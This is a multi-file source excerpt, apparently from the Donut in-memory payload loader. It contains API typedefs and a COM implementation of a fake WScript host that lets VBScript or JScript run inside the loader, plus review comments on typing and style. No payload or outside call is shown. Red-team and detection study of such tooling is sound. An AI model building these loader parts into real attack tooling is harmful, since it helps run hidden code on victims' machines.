typedef LPVOID (WINAPI *VirtualAlloc_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flAllocationType,
    DWORD  flProtect);

typedef BOOL (WINAPI *VirtualFree_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  dwFreeType);

typedef HLOCAL (WINAPI *LocalFree_t)(
    HLOCAL hMem);

typedef HRSRC (WINAPI *FindResource_t)(
    HMODULE hModule,
    LPCSTR  lpName,
    LPCSTR  lpType);

typedef HGLOBAL (WINAPI *LoadResource_t)(
    HMODULE hModule,
    HRSRC   hResInfo);

typedef LPVOID (WINAPI *LockResource_t)(
    HGLOBAL hResData);

typedef DWORD (WINAPI *SizeofResource_t)(
    HMODULE hModule,
    HRSRC   hResInfo);

// NOTE(review): RtlZeroMemory is an ntdll.dll export; the kernel32 name is
// only a header macro -- confirm which module the resolver looks it up in
typedef void (WINAPI *RtlZeroMemory_t)(
    LPVOID Destination,
    SIZE_T Length);
411 | #endif | |
412 | ||
413 | ⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
// Initializes an IHost ("WScript") object in place.
//
// Fills every vtable slot of the IUnknown, IDispatch and IHost interfaces with
// the static Host_* functions defined below, resets the reference count and
// loads the type library that describes IHost so that GetIDsOfNames/Invoke can
// be delegated to ITypeInfo (see Host_GetIDsOfNames and Host_Invoke).
//
// inst : donut instance; supplies the resolved API table (inst->api) and the
//        IIDs compared in Host_QueryInterface.
// host : caller-supplied object; both the object and the vtable it points at
//        must already exist, this function only writes through them.
//
// Returns S_OK when both the type library and the IHost type info were found,
// otherwise the failing HRESULT from LoadTypeLib or GetTypeInfoOfGuid.
static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
    HRESULT hr;

    // IUnknown interface
    host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
    host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
    host->lpVtbl->Release = ADR(LPVOID, Host_Release);

    // IDispatch interface
    host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
    host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
    host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
    host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);

    // IHost interface
    host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
    host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
    host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
    host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
    host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
    host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
    host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
    host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
    host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
    host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
    host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
    host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
    host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
    host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
    host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
    host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
    host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
    host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
    host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
    host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
    host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
    host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
    host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);

    // the count starts at zero and Host_Release never frees the object, so it
    // is informational only; the object is owned by whoever handed it in
    host->m_cRef = 0;
    host->inst = inst;

    // the type library is taken from the wscript.exe path kept in the instance
    // -- presumably the real host's own embedded typelib, so the DISPIDs handed
    // out match what scripts expect
    DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
    hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);

    if(hr == S_OK) {
        DPRINT("ITypeLib::GetTypeInfoOfGuid");

        // pick the IHost interface out of the library by its IID
        hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
            host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
    }
    DPRINT("HRESULT : %08lx", hr);
    return hr;
}
86 | ||
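// IUnknown::QueryInterface for the WScript host object.
//
// The object answers for IUnknown, IDispatch and IHost (the IIDs are taken
// from the instance).  On success *ppv receives the object and, as the COM
// contract requires, a reference is added for the caller; otherwise *ppv is
// NULL and E_NOINTERFACE is returned.  E_POINTER when ppv is NULL,
// E_INVALIDARG when riid is NULL.
static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
    DPRINT("WScript::QueryInterface");

    if(ppv == NULL) return E_POINTER;
    *ppv = NULL;

    if(riid == NULL) return E_INVALIDARG;

    // we implement the following interfaces
    if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
       IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
       IsEqualIID(&iface->inst->xIID_IHost, riid))
    {
        // every successful QueryInterface hands out a new reference
        iface->lpVtbl->AddRef(iface);
        *ppv = iface;
        return S_OK;
    }
    return E_NOINTERFACE;
}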
104 | ||
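// IUnknown::AddRef -- increments the reference count and returns the new value.
//
// The result comes straight from the interlocked operation instead of a second
// read of m_cRef, so a Release racing on another thread cannot make the
// returned count disagree with the increment that was just performed.
static ULONG WINAPI Host_AddRef(IHost *iface) {
    DPRINT("WScript::AddRef");

    return (ULONG)_InterlockedIncrement(&iface->m_cRef);
}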
112 | ||
// IUnknown::Release -- decrements the reference count and returns the new value.
//
// Reaching zero does not free anything: the object is handed to Host_New
// already allocated and is presumably owned by the donut instance, so the
// count only tracks outstanding interface pointers.
static ULONG WINAPI Host_Release(IHost *iface) {
    DPRINT("WScript::Release");

    return (ULONG)_InterlockedDecrement(&iface->m_cRef);
}
120 | ||
// IDispatch::GetTypeInfoCount -- reports how many ITypeInfo objects the host
// provides.  Always one (the IHost type info loaded by Host_New, handed out by
// Host_GetTypeInfo).  E_POINTER when pctinfo is NULL.
static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
    DPRINT("WScript::GetTypeInfoCount");

    if(pctinfo != NULL) {
        *pctinfo = 1;
        return S_OK;
    }
    return E_POINTER;
}
130 | ||
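// IDispatch::GetTypeInfo -- hands out the IHost type info loaded by Host_New.
//
// iTInfo  : must be 0; GetTypeInfoCount reports a single type info, so any
//           other index is DISP_E_BADINDEX per the IDispatch contract.
// lcid    : not used, the type info is the same for every locale.
// ppTInfo : receives an AddRef'd ITypeInfo the caller must Release.
//
// Returns E_POINTER for a NULL ppTInfo and E_UNEXPECTED when Host_New failed
// to load the type library (lpTypeInfo is NULL), instead of dereferencing it.
static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
    DPRINT("WScript::GetTypeInfo");

    if(ppTInfo == NULL) return E_POINTER;
    *ppTInfo = NULL;

    if(iTInfo != 0) return DISP_E_BADINDEX;

    if(iface->lpTypeInfo == NULL) return E_UNEXPECTED;

    // the caller gets its own reference on the shared type info
    iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
    *ppTInfo = iface->lpTypeInfo;

    return S_OK;
}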
142 | ||
143 | // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs, | |
144 | // which can be used on subsequent calls to Invoke. | |
145 | static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid, | |
146 | LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) { | |
147 | DPRINT("WScript::GetIDsOfNames"); | |
148 | ||
149 | return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId); | |
150 | } | |
151 | ||
152 | // Provides access to properties and methods exposed by an object. | |
153 | // The dispatch function DispInvoke provides a standard implementation of Invoke. | |
154 | static HRESULT WINAPI Host_Invoke( | |
155 | IHost *iface, DISPID dispIdMember, REFIID riid, | |
156 | LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult, | |
157 | EXCEPINFO *pExcepInfo, UINT *puArgErr) { | |
158 | ||
159 | DPRINT("WScript::Invoke"); | |
160 | ||
161 | HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke( | |
162 | iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams, | |
163 | pVarResult, pExcepInfo, puArgErr); | |
164 | ||
165 | DPRINT("HRESULT : %08lx", hr); | |
166 | ||
167 | return hr; | |
168 | } | |
169 | ||
170 | // Returns the name of the WScript object (the host executable file). | |
171 | static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) { | |
172 | DPRINT("WScript::Name"); | |
173 | ||
174 | return S_OK; | |
175 | } | |
176 | ||
177 | static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) { | |
178 | DPRINT("WScript::Application"); | |
179 | ||
180 | return E_NOTIMPL; | |
181 | } | |
182 | ||
183 | // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe). | |
184 | static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) { | |
185 | DPRINT("WScript::FullName"); | |
186 | ||
187 | return E_NOTIMPL; | |
188 | } | |
189 | ||
190 | static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) { | |
191 | DPRINT("WScript::Path"); | |
192 | ||
193 | return E_NOTIMPL; | |
194 | } | |
195 | ||
196 | // Gets the script mode, or identifies the script mode. | |
197 | static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) { | |
198 | DPRINT("WScript::get_Interactive"); | |
199 | ||
200 | return E_NOTIMPL; | |
201 | } | |
202 | ||
203 | // Sets the script mode, or identifies the script mode. | |
204 | static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) { | |
205 | DPRINT("WScript::put_Interactive"); | |
206 | ||
207 | return E_NOTIMPL; | |
208 | } | |
209 | ||
210 | // Forces script execution to stop at any time. | |
211 | static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) { | |
212 | DPRINT("WScript::Quit(%i)", ExitCode); | |
213 | ||
214 | // if you know of a better way to do this..let me know. | |
215 | iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0); | |
216 | ||
217 | return S_OK; | |
218 | } | |
219 | ||
220 | // Returns the file name of the currently running script. | |
221 | static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) { | |
222 | DPRINT("WScript::ScriptName"); | |
223 | ||
224 | return E_NOTIMPL; | |
225 | } | |
226 | ||
227 | // Returns the full path of the currently running script. | |
228 | static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) { | |
229 | DPRINT("WScript::ScriptFullName"); | |
230 | ||
231 | return E_NOTIMPL; | |
232 | } | |
233 | ||
234 | // Returns the WshArguments object (a collection of arguments). | |
235 | static HRESULT WINAPI Host_get_Arguments( | |
236 | IHost *iface, void **out_Arguments) { // IArguments2 | |
237 | DPRINT("WScript::Arguments"); | |
238 | ||
239 | return E_NOTIMPL; | |
240 | } | |
241 | ||
242 | static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) { | |
243 | DPRINT("WScript::Version"); | |
244 | ||
245 | return E_NOTIMPL; | |
246 | } | |
247 | ||
248 | // Returns the Windows Script Host build version number. | |
249 | static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) { | |
250 | DPRINT("WScript::BuildVersion"); | |
251 | ||
252 | return E_NOTIMPL; | |
253 | } | |
254 | ||
255 | static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) { | |
256 | DPRINT("WScript::get_Timeout"); | |
257 | ||
258 | return E_NOTIMPL; | |
259 | } | |
260 | ||
261 | static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) { | |
262 | DPRINT("WScript::put_Timeout"); | |
263 | ||
264 | return E_NOTIMPL; | |
265 | } | |
266 | ||
267 | // Connects the object's event sources to functions with a given prefix. | |
268 | static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix, | |
269 | IDispatch **out_Dispatch) { | |
270 | DPRINT("WScript::CreateObject"); | |
271 | ||
272 | return E_NOTIMPL; | |
273 | } | |
274 | ||
275 | // Outputs text to either a message box or the command console window. | |
276 | static HRESULT WINAPI Host_Echo( | |
277 | IHost *iface, SAFEARRAY *args) { | |
278 | DPRINT("WScript::Echo"); | |
279 | ||
280 | return E_NOTIMPL; | |
281 | } | |
282 | ||
283 | // Retrieves an existing object with the specified ProgID, or creates a new one from a file. | |
284 | static HRESULT WINAPI Host_GetObject( | |
285 | IHost *iface, BSTR Pathname, BSTR ProgID, | |
286 | BSTR Prefix, IDispatch **out_Dispatch) { | |
287 | DPRINT("WScript::GetObject"); | |
288 | ||
289 | return E_NOTIMPL; | |
290 | } | |
291 | ||
292 | // Disconnects a connected object's event sources. | |
293 | static HRESULT WINAPI Host_DisconnectObject( | |
294 | IHost *iface, IDispatch *Object) { | |
295 | DPRINT("WScript::DisconnectObject"); | |
296 | ||
297 | return E_NOTIMPL; | |
298 | } | |
299 | ||
300 | // Suspends script execution for a specified length of time, then continues execution. | |
301 | static HRESULT WINAPI Host_Sleep( | |
302 | IHost *iface, LONG Time) { | |
303 | ||
304 | DPRINT("WScript::Sleep"); | |
305 | iface->inst->api.Sleep((DWORD)Time); | |
306 | ||
307 | return S_OK; | |
308 | } | |
309 | ||
310 | // Connects the object's event sources to functions with a given prefix. | |
311 | static HRESULT WINAPI Host_ConnectObject( | |
312 | IHost *iface, IDispatch *Object, BSTR Prefix) { | |
313 | DPRINT("WScript::ConnectObject"); | |
314 | ||
315 | return E_NOTIMPL; | |
316 | } | |
317 | ||
318 | // Exposes the read-only input stream for the current script. | |
319 | static HRESULT WINAPI Host_get_StdIn( | |
320 | IHost *iface, void **ppts) { // ppts is ITextStream | |
321 | DPRINT("WScript::StdIn"); | |
322 | ||
323 | return E_NOTIMPL; | |
324 | } | |
325 | ||
326 | // Exposes the write-only output stream for the current script. | |
327 | static HRESULT WINAPI Host_get_StdOut( | |
328 | IHost *iface, void **ppts) { // ppts is ITextStream | |
329 | DPRINT("WScript::StdOut"); | |
330 | ||
331 | return E_NOTIMPL; | |
332 | } | |
333 | ||
334 | // Exposes the write-only error output stream for the current script. | |
335 | static HRESULT WINAPI Host_get_StdErr( | |
336 | IHost *iface, void **ppts) { // ppts is ITextStream | |
337 | DPRINT("WScript::StdErr"); | |
338 | ||
339 | return E_NOTIMPL; | |
340 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef WSCRIPT_H | |
32 | #define WSCRIPT_H | |
33 | ||
34 | #include "../include/donut.h" | |
35 | ||
36 | typedef struct _IHost IHost; | |
37 | ||
38 | typedef struct _IHostVtbl { | |
39 | BEGIN_INTERFACE | |
40 | ||
41 | HRESULT (STDMETHODCALLTYPE *QueryInterface)( | |
42 | IHost *This, | |
43 | REFIID riid, | |
44 | void **ppvObject); | |
45 | ||
46 | ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This); | |
47 | ||
48 | ULONG (STDMETHODCALLTYPE *Release)(IHost *This); | |
49 | ||
50 | HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)( | |
51 | IHost *This, | |
52 | UINT *pctinfo); | |
53 | ||
54 | HRESULT (STDMETHODCALLTYPE *GetTypeInfo)( | |
55 | IHost *This, | |
56 | UINT iTInfo, | |
57 | LCID lcid, | |
58 | ITypeInfo **ppTInfo); | |
59 | ||
60 | HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)( | |
61 | IHost *This, | |
62 | REFIID riid, | |
63 | LPOLESTR *rgszNames, | |
64 | UINT cNames, | |
65 | LCID lcid, | |
66 | DISPID *rgDispId); | |
67 | ||
68 | HRESULT (STDMETHODCALLTYPE *Invoke)( | |
69 | IHost *This, | |
70 | DISPID dispIdMember, | |
71 | REFIID riid, | |
72 | LCID lcid, | |
73 | WORD wFlags, | |
74 | DISPPARAMS *pDispParams, | |
75 | VARIANT *pVarResult, | |
76 | EXCEPINFO *pExcepInfo, | |
77 | UINT *puArgErr); | |
78 | ||
79 | HRESULT (STDMETHODCALLTYPE *get_Name)( | |
80 | IHost *This, | |
81 | BSTR *out_Name); | |
82 | ||
83 | HRESULT (STDMETHODCALLTYPE *get_Application)( | |
84 | IHost *This, | |
85 | IDispatch **out_Dispatch); | |
86 | ||
87 | HRESULT (STDMETHODCALLTYPE *get_FullName)( | |
88 | IHost *This, | |
89 | BSTR *out_Path); | |
90 | ||
91 | HRESULT (STDMETHODCALLTYPE *get_Path)( | |
92 | IHost *This, | |
93 | BSTR *out_Path); | |
94 | ||
95 | HRESULT (STDMETHODCALLTYPE *get_Interactive)( | |
96 | IHost *This, | |
97 | VARIANT_BOOL *out_Interactive); | |
98 | ||
99 | HRESULT (STDMETHODCALLTYPE *put_Interactive)( | |
100 | IHost *This, | |
101 | VARIANT_BOOL v); | |
102 | ||
103 | HRESULT (STDMETHODCALLTYPE *Quit)( | |
104 | IHost *This, | |
105 | int ExitCode); | |
106 | ||
107 | HRESULT (STDMETHODCALLTYPE *get_ScriptName)( | |
108 | IHost *This, | |
109 | BSTR *out_ScriptName); | |
110 | ||
111 | HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)( | |
112 | IHost *This, | |
113 | BSTR *out_ScriptFullName); | |
114 | ||
115 | HRESULT (STDMETHODCALLTYPE *get_Arguments)( | |
116 | IHost *This, | |
117 | void **out_Arguments); | |
118 | ||
119 | HRESULT (STDMETHODCALLTYPE *get_Version)( | |
120 | IHost *This, | |
121 | BSTR *out_Version); | |
122 | ||
123 | HRESULT (STDMETHODCALLTYPE *get_BuildVersion)( | |
124 | IHost *This, | |
125 | int *out_Build); | |
126 | ||
127 | HRESULT (STDMETHODCALLTYPE *get_Timeout)( | |
128 | IHost *This, | |
129 | LONG *out_Timeout); | |
130 | ||
131 | HRESULT (STDMETHODCALLTYPE *put_Timeout)( | |
132 | IHost *This, | |
133 | LONG v); | |
134 | ||
135 | HRESULT (STDMETHODCALLTYPE *CreateObject)( | |
136 | IHost *This, | |
137 | BSTR ProgID, | |
138 | BSTR Prefix, | |
139 | IDispatch **out_Dispatch); | |
140 | ||
141 | HRESULT (STDMETHODCALLTYPE *Echo)( | |
142 | IHost *This, | |
143 | SAFEARRAY *args); | |
144 | ||
145 | HRESULT (STDMETHODCALLTYPE *GetObject)( | |
146 | IHost *This, | |
147 | BSTR Pathname, | |
148 | BSTR ProgID, | |
149 | BSTR Prefix, | |
150 | IDispatch **out_Dispatch); | |
151 | ||
152 | HRESULT (STDMETHODCALLTYPE *DisconnectObject)( | |
153 | IHost *This, | |
154 | IDispatch *Object); | |
155 | ||
156 | HRESULT (STDMETHODCALLTYPE *Sleep)( | |
157 | IHost *This, | |
158 | LONG Time); | |
159 | ||
160 | HRESULT (STDMETHODCALLTYPE *ConnectObject)( | |
161 | IHost *This, | |
162 | IDispatch *Object, | |
163 | BSTR Prefix); | |
164 | ||
165 | HRESULT (STDMETHODCALLTYPE *get_StdIn)( | |
166 | IHost *This, | |
167 | void **ppts); | |
168 | ||
169 | HRESULT (STDMETHODCALLTYPE *get_StdOut)( | |
170 | IHost *This, | |
171 | void **ppts); | |
172 | ||
173 | HRESULT (STDMETHODCALLTYPE *get_StdErr)( | |
174 | IHost *This, | |
175 | void **ppts); | |
176 | ||
177 | END_INTERFACE | |
178 | } IHostVtbl; | |
179 | ||
180 | typedef struct _IHost { | |
181 | IHostVtbl *lpVtbl; // virtual function table | |
182 | ITypeLib *lpTypeLib; // type library | |
183 | ITypeInfo *lpTypeInfo; // type information for WScript properties/methods | |
184 | IActiveScript *lpEngine; // IActiveScript engine from main thread | |
185 | ULONG m_cRef; // reference count | |
186 | PDONUT_INSTANCE inst; | |
187 | } IHost; | |
188 | ||
189 | static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host); | |
190 | ||
191 | // Queries a COM object for a pointer to one of its interface. | |
192 | static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv); | |
193 | ||
194 | // Increments the reference count for an interface pointer to a COM object. | |
195 | static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This); | |
196 | ||
197 | // Decrements the reference count for an interface on a COM object. | |
198 | static STDMETHODIMP_(ULONG) Host_Release(IHost *This); | |
199 | ||
200 | // Retrieves the number of type information interfaces that an object provides (either 0 or 1). | |
201 | static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo); | |
202 | ||
203 | // Retrieves the type information for an object, which can then be used to get the type information for an interface. | |
204 | static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo); | |
205 | ||
206 | // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs, | |
207 | // which can be used on subsequent calls to Invoke. | |
208 | static STDMETHODIMP Host_GetIDsOfNames( | |
209 | IHost *This, REFIID riid, LPOLESTR *rgszNames, | |
210 | UINT cNames, LCID lcid, DISPID *rgDispId); | |
211 | ||
212 | // Provides access to properties and methods exposed by an object. | |
213 | // The dispatch function DispInvoke provides a standard implementation of Invoke. | |
214 | static STDMETHODIMP Host_Invoke( | |
215 | IHost *This, DISPID dispIdMember, REFIID riid, | |
216 | LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult, | |
217 | EXCEPINFO *pExcepInfo, UINT *puArgErr); | |
218 | ||
219 | // Returns the name of the WScript object (the host executable file). | |
220 | static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name); | |
221 | ||
222 | static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch); | |
223 | ||
224 | // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe). | |
225 | static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path); | |
226 | ||
227 | static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path); | |
228 | ||
229 | // Gets the script mode, or identifies the script mode. | |
230 | static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive); | |
231 | ||
232 | // Sets the script mode, or identifies the script mode. | |
233 | static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v); | |
234 | ||
235 | // Forces script execution to stop at any time. | |
236 | static STDMETHODIMP Host_Quit(IHost *This, int ExitCode); | |
237 | ||
238 | // Returns the file name of the currently running script. | |
239 | static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName); | |
240 | ||
241 | // Returns the full path of the currently running script. | |
242 | static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName); | |
243 | ||
244 | // Returns the WshArguments object (a collection of arguments). | |
245 | static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments); | |
246 | ||
247 | static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version); | |
248 | ||
249 | // Returns the Windows Script Host build version number. | |
250 | static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build); | |
251 | ||
252 | static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout); | |
253 | ||
254 | static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v); | |
255 | ||
256 | // Connects the object's event sources to functions with a given prefix. | |
257 | static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch); | |
258 | ||
259 | // Outputs text to either a message box or the command console window. | |
260 | static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args); | |
261 | ||
262 | // Retrieves an existing object with the specified ProgID, or creates a new one from a file. | |
263 | static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch); | |
264 | ||
265 | // Disconnects a connected object's event sources. | |
266 | static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object); | |
267 | ||
268 | // Suspends script execution for a specified length of time, then continues execution. | |
269 | static STDMETHODIMP Host_Sleep(IHost *This, LONG Time); | |
270 | ||
271 | // Connects the object's event sources to functions with a given prefix. | |
272 | static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix); | |
273 | ||
274 | // Exposes the read-only input stream for the current script. | |
275 | static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts); | |
276 | ||
277 | // Exposes the write-only output stream for the current script. | |
278 | static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts); | |
279 | ||
280 | // Exposes the write-only error output stream for the current script. | |
281 | static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts); | |
282 | ||
283 | #endif |
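Review bot: `m_cRef` is declared as a plain `ULONG` in `_IHost` (line 185 of this header), yet the implementation in wscript.c hands its address to `_InterlockedIncrement`/`_InterlockedDecrement`, whose parameter type is `LONG volatile *`; declaring it `volatile LONG m_cRef; // reference count` matches the intrinsics' contract and removes the pointer-type mismatch the compiler will otherwise warn about. The prototypes here are spelled `STDMETHODIMP` / `STDMETHODIMP_(ULONG)` while the definitions in wscript.c use `HRESULT WINAPI` / `ULONG WINAPI`; they expand to the same calling convention, but using one spelling in both files makes the vtable contract easier to audit. `Host_New` (line 189) is the only declaration without a comment; a line such as `// Initialises the caller-supplied IHost for inst; returns an HRESULT.` would bring it in line with the rest of the header.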
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
